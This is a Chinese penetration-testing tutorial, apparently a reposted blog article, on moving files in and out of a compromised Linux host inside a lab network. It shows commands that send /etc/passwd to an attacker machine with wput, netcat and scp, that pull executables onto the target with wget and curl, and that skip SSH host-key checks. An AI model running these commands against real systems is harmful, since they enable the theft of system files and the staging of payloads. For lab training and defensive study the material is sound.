linux 内网文件传输工具_【内网渗透】Linux下的内网传输技术

本文介绍了Linux下进行内网文件传输的多种方法,包括使用Wput进行FTP上传,Wget进行下载,Curl支持HTTP/HTTPS/FTP下载,NETCAT(NC)实现文件传输,xxd工具以十六进制形式复制文件,以及SCP通过SSH安全传输文件。这些工具在内网渗透测试中非常实用。
摘要由CSDN通过智能技术生成
5548b21f316b2c34e65b99a56753264c.png点击上方 “公众号” 可以订阅哦!

Hello,各位小伙伴大家好~b9364d0fd9e4c2a1639c8397df8685c4.pngb9364d0fd9e4c2a1639c8397df8685c4.png

2d389a3852dca152f51d754b125a6344.png

这里是一名白帽的成长史~

cd048745e741800d31ba924511808fe6.png

前天我们说了Windows下的内网传输技术:

【内网渗透】Windows下的内网传输技术

今天再来看看Linux下的内网传输吧~

b5d8a067b35a41fd935a82f6afde32a8.png 4417317b9caca926dd0a8cfd0f1625e1.png

Part.1

Wput/Wget

Wput

Wput是一款linux环境下用于向ftp服务器上传的工具。

首先,我们在本地搭建一个ftp服务器,如3CDaemon:

d736bb89b89acac593db96d9d6506705.png

创建一个用户monster/a123456:

39ecdf5657291c36dea418f3dac1777f.png

例如把靶机的/etc/passwd文件上传至ftp服务器:

wput ./passwd ftp://monster:a123456@192.168.3.1
32fb2a2e47fc7cc08ae4aa12db4bf5f7.png

在ftp服务器中可以找到该文件:

ef339e126f28d90be477b58bf5d76bc1.png b7b23a3f125c4535aa4deb4ca41fd2e2.gif

Wget

Wput用于上传,Wget则用于下载。

Wget支持HTTP,HTTPS,FTP协议进行文件下载。例如使用靶机下载hash.exe:

wget --ftp-user=username --ftp-password=password ftp://192.168.3.1/hash.exe
1486b272b2eb982582becad5fc5b4c0a.png

通过http的方法进行文件下载,先在本地开启http服务:

239cfe15329c638a4816787f312cec1e.png

靶机下载文件:

wget http://192.168.3.1/editor.exe
6b2253e0aeec95a4d115133803d9c1bc.png 4417317b9caca926dd0a8cfd0f1625e1.png

Part.2

Curl

Curl

我们之前还讲过一期curl工具:

【Linux】关于Curl工具与HTTP的二三事

也可以利用该工具进行http下载:

curl –O http://192.168.3.1/editor.exe
5bdca18a4f222e39fa411256989ef3ef.png 4417317b9caca926dd0a8cfd0f1625e1.png

Part.3

NC

NC

NETCAT是kali中自带的一款功能强大的工具,我们可以通过它来文件传输。

例如传输靶机的passwd文件。

首先在本地开启监听,并将接收的内容保存为test.txt:

nc -nvv -lp 4444 > test.txt
a73b963fcf2975f5ff27e813ace2d943.png

靶机如果没有nc,可以先通过以下命令安装:

95abbf384e79c4b20ec81d34831df084.png

在靶机将目标文件传至kali:

nc 192.168.3.144 4444 < /etc/passwd
68f37af45b60253308f420a3a21d351b.png

传输完毕后在kali中可以找到该文件:

87ed4c21bc75a22174239f61cef9681c.png

关于nc的其他操作,之前也写过一期。

有兴趣的小伙伴可以看看:

【工具篇】NETCAT-网络中的瑞士军刀

4417317b9caca926dd0a8cfd0f1625e1.png

Part.4

xxd

xxd

xxd工具的作用是将一个文件以十六进制的形式显示出来。

我们可以利用该方法将靶机中的可执行文件“复制”出来。如显示hash.exe:

xxd hash.exe
b40ca5b4d1fb9ee43e75cbd18d54b202.png

将以上内容复制出来,在本地造一个一模一样的文本:

f6ce1a27e358a86e7c3783daf99075b4.png

去掉左右多余的内容:

5b98a8282a51dfe469f73499515805e1.png

替换掉空格、换行符:

deeddcd2b42840aec1479572dd90c3f0.png

打开一个十六进制编辑器导入以上内容,如010editor:

6176d3323757c0cf6358e0a819324bc2.png

另存为hash.exe并打开,程序可以正常运行:

006b516c7f4f181b44c7dc5326b3bc0d.png

//成功~

当然除了xxd工具,其他如hexdump也可以达到相同的效果:

hexdump -C hash.exe
f8a31c6ec0650bca72f854827d20363a.png 4417317b9caca926dd0a8cfd0f1625e1.png

Part.5

SCP

scp

Scp通过ssh进行数据传输,如果知道用户名和密码,也可以通过它来进行文件传输。例如,从本地复制文件到远程:

scp /etc/passwd root@192.168.3.146:/root/Desktop/password
11eb0ca30955147a2a9e939d41a6e796.png

在对端服务器可以看到传输的文件:

6d5d0ca09d6d2e322e4f92712b0b6ab6.png

从对端服务器下载文件:

scp root@192.168.3.146:/root/Desktop/payload.txt /root/payload.txt
ffd90ca3315b8dff3051492857eb11b9.png

如果出现如下报错:

Theauthenticity of host 192.168.0.xxx can't be established.

可以先按以下方法进行操作:

ssh -o StrictHostKeyChecking=no 192.168.3.146
c40275be94aee3f8d21730370a5cd892.png 4417317b9caca926dd0a8cfd0f1625e1.png

Part.6

结语

好啦,以上就是今天的全部内容了~

当然方法远不如此,如果对端是一个web服务器,你甚至可以把文件上传至web目录当中,直接访问下载。

eb83c7af3cf173f557de990a5def01c0.png

如果有问题,欢迎到公众号一名白帽的成长史留言~

Peace!96f62bc012931b3efb20e2aa0843bca6.png

c5e2777fa049db880fb441431aed976b.png

你“在看”我吗?

abf18fe2e0e4c6e45effe7ad91e1e844.png
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值